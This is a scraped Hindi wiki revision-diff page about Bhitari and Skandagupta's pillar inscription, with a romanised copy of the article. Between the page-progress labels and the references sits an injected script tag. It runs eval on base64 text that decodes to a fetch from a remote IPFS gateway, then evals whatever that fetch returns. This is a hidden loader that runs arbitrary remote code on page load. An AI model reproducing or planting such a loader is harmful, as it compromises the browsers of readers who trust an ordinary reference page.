Difference between revisions of "भितरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 3: Line 3:
 
*मूर्ति अब लुप्त हो चुकी है, लेकिन स्तम्भ अब भी खड़ा है और इस पर [[संस्कृत]] में एक विस्तृत अभिलेख अंकित है।
 
*मूर्ति अब लुप्त हो चुकी है, लेकिन स्तम्भ अब भी खड़ा है और इस पर [[संस्कृत]] में एक विस्तृत अभिलेख अंकित है।
 
*अभिलेख में स्कन्दगुप्त की वंशावली तथा पुष्यमित्रों तथा [[हूण|हूणों]] से हुए युद्धों का भी विवरण है।
 
*अभिलेख में स्कन्दगुप्त की वंशावली तथा पुष्यमित्रों तथा [[हूण|हूणों]] से हुए युद्धों का भी विवरण है।
*अभिलेख के अनुसार स्कन्दगुप्त [[कुमारगुप्त प्रथम]] (413-55 ई.) का पुत्र और उत्तराधिकारी था।
+
*अभिलेख के अनुसार स्कन्दगुप्त [[कुमारगुप्त प्रथम महेन्द्रादित्य|कुमारगुप्त प्रथम]] (413-55 ई.) का पुत्र और उत्तराधिकारी था।
 
*1889 ई. में कुमारगुप्त द्वितीय की एक मोहर भितरी में मिली थी।
 
*1889 ई. में कुमारगुप्त द्वितीय की एक मोहर भितरी में मिली थी।
*इस मोहर पर स्कन्दगुप्त का कोई उल्लेख नहीं है और [[पुरगुप्त]] को कुमारगुप्त प्रथम का पुत्र तथा उत्तराधिकारी बतलाया गया है।
+
*इस मोहर पर स्कन्दगुप्त का कोई उल्लेख नहीं है और [[पुरुगुप्त]] को कुमारगुप्त प्रथम का उत्तराधिकारी बतलाया गया है।
 
*भितरी में प्राप्त अभिलेख तथा मोहर की परस्पर प्रतिकूल बातों का समाधान करने के लिए यह अनुमान किया जाता है कि पुरगुप्त, स्कन्दगुप्त का सौतेला भाई था और वह स्कन्दगुप्त की मृत्यु के उपरान्त सिंहासनारूढ़ हुआ था।  
 
*भितरी में प्राप्त अभिलेख तथा मोहर की परस्पर प्रतिकूल बातों का समाधान करने के लिए यह अनुमान किया जाता है कि पुरगुप्त, स्कन्दगुप्त का सौतेला भाई था और वह स्कन्दगुप्त की मृत्यु के उपरान्त सिंहासनारूढ़ हुआ था।  
  

Revision as of 21:38, 6 December 2010

  • bhitari, banaras se poorv gajipur zile mean sthit hai.
  • yahaan paanchavean gupt samrat skandagupt (455-67 ee.) ne ek stambh nirmit karaya tha, jisake shirsh par vishnu ki moorti thi.
  • moorti ab lupt ho chuki hai, lekin stambh ab bhi kh da hai aur is par sanskrit mean ek vistrit abhilekh aankit hai.
  • abhilekh mean skandagupt ki vanshavali tatha pushyamitroan tatha hoonoan se hue yuddhoan ka bhi vivaran hai.
  • abhilekh ke anusar skandagupt kumaragupt pratham (413-55 ee.) ka putr aur uttaradhikari tha.
  • 1889 ee. mean kumaragupt dvitiy ki ek mohar bhitari mean mili thi.
  • is mohar par skandagupt ka koee ullekh nahian hai aur purugupt ko kumaragupt pratham ka uttaradhikari batalaya gaya hai.
  • bhitari mean prapt abhilekh tatha mohar ki paraspar pratikool batoan ka samadhan karane ke lie yah anuman kiya jata hai ki puragupt, skandagupt ka sautela bhaee tha aur vah skandagupt ki mrityu ke uparant sianhasanaroodh hua tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  • (pustak 'bharatiy itihas kosh') prishth sankhya-337